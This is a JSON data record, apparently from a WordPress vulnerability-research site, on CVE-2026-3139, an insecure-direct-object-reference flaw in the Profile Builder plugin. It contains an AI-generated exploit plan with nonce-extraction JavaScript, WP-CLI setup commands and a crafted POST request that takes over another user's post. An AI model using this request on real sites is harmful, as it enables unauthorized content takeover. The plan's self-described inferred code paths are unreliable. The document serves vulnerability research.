[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWulfytl-WSmwAfN_-L_LhLOIy_lboP0N9nTBSGv--zw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":9,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":38},"CVE-2026-3139","user-profile-builder-beautiful-user-registration-forms-user-profiles-user-role-editor-insecure-direct-object-reference-t","User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor \u003C= 3.15.5 - Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary Post Author Reassignment via Avatar Field","The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.15.5 via the wppb_save_avatar_value() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to reassign ownership of arbitrary posts and attachments by changing 'post_author'.","profile-builder",null,"\u003C=3.15.5","3.15.6","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-03-30 21:39:25","2026-03-31 11:18:59",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F760f7736-db49-4210-a2f3-3abb506106d7?source=api-prod",1,[22,23,24,25,26,27],"add-ons-free\u002Fcustom-css-classes-on-fields\u002Fassets\u002Fjs\u002Fmain.js","admin\u002Fadmin-functions.php","admin\u002Fmanage-fields.php","assets\u002Fcss\u002Fstyle-back-end-edit-user.css","assets\u002Fcss\u002Fstyle-back-end.css","assets\u002Fcss\u002Fstyle-front-end.css","researched",false,3,"This plan outlines the research and exploitation process for **CVE-2026-3139**, an Insecure Direct Object Reference (IDOR) vulnerability in the **User Profile Builder** plugin. The vulnerability allows authenticated users (Subscriber level and above) to reassign the ownership of arbitrary WordPress posts or attachments to themselves by manipulating the Avatar field during a profile update.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Insecure Direct Object Reference (IDOR)\n*   **Affected Function:** `wppb_save_avatar_value()` (likely located in `front-end\u002Fextra-fields\u002Favatar\u002Favatar.php` or `front-end\u002Fedit-profile.php`)\n*   **Root Cause:** The function `wppb_save_avatar_value()` processes user-submitted avatar data. It likely accepts an attachment ID or post ID from a request parameter and updates the `post_author` of that ID to the current user's ID without verifying that the user owns the post or that the post is actually an uploaded avatar.\n*   **Impact:** Arbitrary Post\u002FAttachment takeover. An attacker can become the author of any post, page, or media item, potentially gaining the ability to edit or delete it depending on their role's capabilities over their own posts.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The Edit Profile page (frontend) generated by the `[wppb-edit-profile]` shortcode.\n*   **Method:** `POST` request to the page URL containing the edit profile form.\n*   **Vulnerable Parameter:** The field associated with the \"Avatar\" type. Based on standard Profile Builder naming conventions, this is typically `hidden_avatar_attachment_id_{field_id}` or `avatar_{field_id}`.\n*   **Authentication:** Subscriber level or higher is required.\n*   **Precondition:** An \"Avatar\" field must be added to the Profile Builder form fields (Manage Form Fields).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A user submits the Edit Profile form.\n2.  **Hook:** The plugin triggers the profile update logic, often hooked to `profile_update` or via its own `wppb_edit_profile` processing logic.\n3.  **Field Processing:** The plugin iterates through the defined fields. For the \"Avatar\" field type, it calls `wppb_save_avatar_value()`.\n4.  **Vulnerable Logic:** \n    *   The function retrieves a post ID from the `$_POST` array (e.g., an attachment ID intended to be the avatar).\n    *   It calls `wp_update_post()` or a similar database operation.\n    *   It sets `'post_author' => $current_user_id` for the provided ID.\n5.  **Sink:** `wp_update_post( array( 'ID' => $user_provided_id, 'post_author' => $attacker_user_id ) )`.\n\n### 4. Nonce Acquisition Strategy\nThe Edit Profile form is protected by a WordPress nonce.\n\n1.  **Identify Shortcode:** The plugin uses `[wppb-edit-profile]` to display the edit profile form.\n2.  **Create Setup Page:** Use WP-CLI to create a page with this shortcode.\n3.  **Navigate and Extract:**\n    *   Log in as a Subscriber.\n    *   Navigate to the created page using `browser_navigate`.\n    *   The nonce is usually in a hidden input field named `_wpnonce` or `wppb_edit_profile_nonce`.\n    *   **JS Extraction:** \n        ```javascript\n        \u002F\u002F Check for common Profile Builder nonce locations\n        document.querySelector('input[name=\"_wpnonce\"]')?.value || \n        document.querySelector('input[name=\"wppb_edit_profile_nonce\"]')?.value\n        ```\n\n### 5. Test Data Setup\n1.  **Target Content:** Create a post as the Administrator (ID will be the target).\n    *   `wp post create --post_type=post --post_title=\"Sensitive Post\" --post_status=publish --post_author=1` (Note the returned ID, e.g., `123`).\n2.  **Attacker User:** Create a Subscriber user.\n    *   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n3.  **Plugin Config:** Ensure an \"Avatar\" field exists.\n    *   `wp eval \"wppb_fields_list();\"` to check existing fields.\n    *   If missing, add it (usually requires `wppb_manage_fields` option manipulation or using the admin UI).\n4.  **Form Page:**\n    *   `wp post create --post_type=page --post_title=\"Edit Profile\" --post_content='[wppb-edit-profile]' --post_status=publish`\n\n### 6. Exploitation Strategy\n\n#### Step 1: Discover Field ID\nNavigate to the Edit Profile page as the Subscriber and find the `name` attribute of the Avatar field. It usually looks like `avatar_nn` or `hidden_avatar_attachment_id_nn`.\n\n#### Step 2: Craft the Takeover Request\nPerform a POST request to the Edit Profile page URL.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fedit-profile\u002F`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: (If applicable, though Profile Builder often processes via `init`)\n    *   `wppb_edit_profile`: `true`\n    *   `wppb_edit_profile_nonce`: `[EXTRACTED_NONCE]`\n    *   `[AVATAR_FIELD_NAME]`: `[TARGET_POST_ID]` (The ID of the Admin's post)\n    *   `username`: `attacker`\n    *   `email`: `attacker@example.com`\n\n#### Step 3: Execution via `http_request`\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Findex.php\u002Fedit-profile\u002F\",\n  \"params\": {\n    \"wppb_edit_profile\": \"true\",\n    \"wppb_edit_profile_nonce\": \"a1b2c3d4e5\",\n    \"avatar_5\": \"123\", \n    \"email\": \"attacker@example.com\",\n    \"nickname\": \"attacker\"\n  }\n}\n```\n*(Note: `avatar_5` is an example; the exact field ID must be found in the HTML source.)*\n\n### 7. Expected Results\n*   The plugin will process the update.\n*   Because `wppb_save_avatar_value()` does not verify that `$_POST['avatar_5']` (ID 123) is an attachment belonging to the user, it will execute an update command on Post 123.\n*   The `post_author` of Post 123 will be changed from `1` (Admin) to the Attacker's User ID.\n\n### 8. Verification Steps\nAfter the exploit, use WP-CLI to verify the change in ownership:\n1.  **Check Post Author:**\n    *   `wp post get 123 --field=post_author`\n    *   **Success Condition:** The output matches the Attacker's User ID.\n2.  **Check Metadata (Optional):**\n    *   `wp post meta list 123` (To see if any avatar-specific meta was incorrectly added to the post).\n\n### 9. Alternative Approaches\n*   **Attachment Takeover:** Instead of a post, target an attachment ID (`post_type=attachment`) belonging to the Admin. This is often easier to hide.\n*   **Backend Profile Update:** If the vulnerability exists in `admin\u002Fadmin-functions.php` (as suggested by the source file list), the exploit might be triggered via `\u002Fwp-admin\u002Fprofile.php` if the plugin injects its fields there.\n*   **AJAX Endpoint:** Check if the avatar upload\u002Fsave is handled via `wp_ajax_wppb_save_avatar`. If so, the request would go to `admin-ajax.php` with the `action` parameter.","The User Profile Builder plugin for WordPress is vulnerable to an Insecure Direct Object Reference (IDOR) via the `wppb_save_avatar_value()` function. Authenticated attackers with subscriber-level access and above can reassign ownership of arbitrary posts or attachments to themselves by manipulating the avatar attachment ID parameter during a profile update.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofile-builder\u002F3.15.5\u002Fadd-ons-free\u002Fcustom-css-classes-on-fields\u002Fassets\u002Fjs\u002Fmain.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofile-builder\u002F3.15.6\u002Fadd-ons-free\u002Fcustom-css-classes-on-fields\u002Fassets\u002Fjs\u002Fmain.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofile-builder\u002F3.15.5\u002Fadd-ons-free\u002Fcustom-css-classes-on-fields\u002Fassets\u002Fjs\u002Fmain.js\t2023-11-27 09:16:22.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprofile-builder\u002F3.15.6\u002Fadd-ons-free\u002Fcustom-css-classes-on-fields\u002Fassets\u002Fjs\u002Fmain.js\t2026-03-13 08:40:38.000000000 +0000\n@@ -8,7 +8,7 @@\n         return false;\n     }\n \n-    var updateFields = ['Default - Name (Heading)', 'Default - Contact Info (Heading)', 'Default - About Yourself (Heading)', 'Default - Username', 'Default - First Name', 'Default - Last Name', 'Default - Nickname', 'Default - E-mail', 'Default - Website', 'Default - AIM', 'Default - Yahoo IM', 'Default - Jabber \u002F Google Talk', 'Default - Password', 'Default - Repeat Password', 'Default - Biographical Info', 'Default - Display name publicly as', 'Heading', 'Input', 'Textarea', 'WYSIWYG', 'Select', 'Datepicker', 'Select (Multiple)', 'Checkbox', 'Radio', 'Upload', 'Phone', 'Timepicker', 'Colorpicker', 'Validation', 'Select (User Role)', 'Select (CPT)', 'Select (Timezone)', 'Select (Country)', 'Select (Currency)', 'Email', 'URL', 'GDPR Checkbox', 'GDPR Delete Button', 'Map', 'Number', 'Avatar', 'Input (Hidden)', 'Language', 'HTML', 'Select2', 'Checkbox (Terms and Conditions)', 'reCAPTCHA', 'Select2 (Multiple)', 'Honeypot', 'Email Confirmation' ];\n+    var updateFields = ['Default - Name (Heading)', 'Default - Contact Info (Heading)', 'Default - About Yourself (Heading)', 'Default - Username', 'Default - First Name', 'Default - Last Name', 'Default - Nickname', 'Default - E-mail', 'Default - Website', 'Default - AIM', 'Default - Yahoo IM', 'Default - Jabber \u002F Google Talk', 'Default - Password', 'Default - Repeat Password', 'Default - Biographical Info', 'Default - Display name publicly as', 'Heading', 'Input', 'Textarea', 'WYSIWYG', 'Select', 'Datepicker', 'Select (Multiple)', 'Checkbox', 'Radio', 'Upload', 'Phone', 'Timepicker', 'Colorpicker', 'Validation', 'Select (User Role)', 'Select (CPT)', 'Select (Timezone)', 'Select (Country)', 'Select (Currency)', 'Email', 'URL', 'GDPR Checkbox', 'GDPR Delete Button', 'Map', 'Number', 'Avatar', 'Input (Hidden)', 'International Telephone Input','Language', 'HTML', 'Select2', 'Checkbox (Terms and Conditions)', 'reCAPTCHA', 'Select2 (Multiple)', 'Honeypot', 'Email Confirmation' ];\n \n     for( var i = 0; i \u003C updateFields.length; i++ ) {\n         fields[ updateFields[i] ]['show_rows'].push( '.row-class-field' );\n... (truncated)","1. Authenticate to the WordPress site as a Subscriber-level user.\n2. Navigate to a page containing the frontend profile edit form (generated by the `[wppb-edit-profile]` shortcode).\n3. Inspect the form to find the field name corresponding to the Avatar (e.g., `avatar_5` or `hidden_avatar_attachment_id_5`) and extract the CSRF nonce (e.g., `_wpnonce` or `wppb_edit_profile_nonce`).\n4. Identify a target post ID or attachment ID that belongs to another user (e.g., an Administrator's post).\n5. Submit a POST request to the profile update endpoint with the `wppb_edit_profile` parameter set to `true`, the extracted nonce, and the avatar field parameter set to the target post ID.\n6. The plugin processes the update and, because it lacks authorization checks on the avatar ID, executes an update setting the `post_author` of the target ID to the attacker's user ID.","gemini-3-flash-preview","2026-04-17 22:08:47","2026-04-17 22:09:38",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","3.15.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofile-builder\u002Ftags\u002F3.15.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofile-builder.3.15.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofile-builder\u002Ftags\u002F3.15.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprofile-builder.3.15.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fprofile-builder\u002Ftags"]